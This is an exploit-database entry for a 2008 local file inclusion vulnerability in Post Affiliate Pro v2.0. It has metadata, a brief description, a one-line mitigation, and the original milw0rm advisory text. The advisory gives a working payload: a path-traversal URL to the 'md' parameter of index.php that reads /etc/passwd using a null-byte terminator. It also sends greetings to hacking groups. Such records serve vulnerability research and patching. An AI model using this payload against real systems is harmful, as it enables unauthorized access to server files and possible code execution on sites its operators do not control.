header-logo
Suggest Exploit
vendor:
Post Affiliate Pro
by:
ZeN
7.5
CVSS
HIGH
Local File Inclusion
22
CWE
Product Name: Post Affiliate Pro
Affected Version From: 2
Affected Version To: 2
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Post Affiliate Pro v2.0 Local File Inclusion

The vulnerability exists due to insufficient sanitization of user-supplied input to the 'md' parameter in 'index.php' script. A remote attacker can include a local file and execute arbitrary code on the vulnerable system.

Mitigation:

Input validation should be performed to ensure that malicious input is not passed to the vulnerable script.
Source

Exploit-DB raw data:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Software : Post Affiliate Pro v2.0
Vulnrability : Local File Inclusion
Severity : High

Author : ZeN
Date : 16 October 2008

Websites >
http://DUSecurity.com
http://DarkCode.me

PS : You MUST be logged into the system for the exploit to work.

Exploit >

http://site.com/affiliates/index.php?md=../../../../../../../etc/passwd%00


Shouts>
DUSecurity Group
DarkCode
WL-Group
IWannaHack
Milw0rm
EnigmaGroup

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# milw0rm.com [2008-10-16]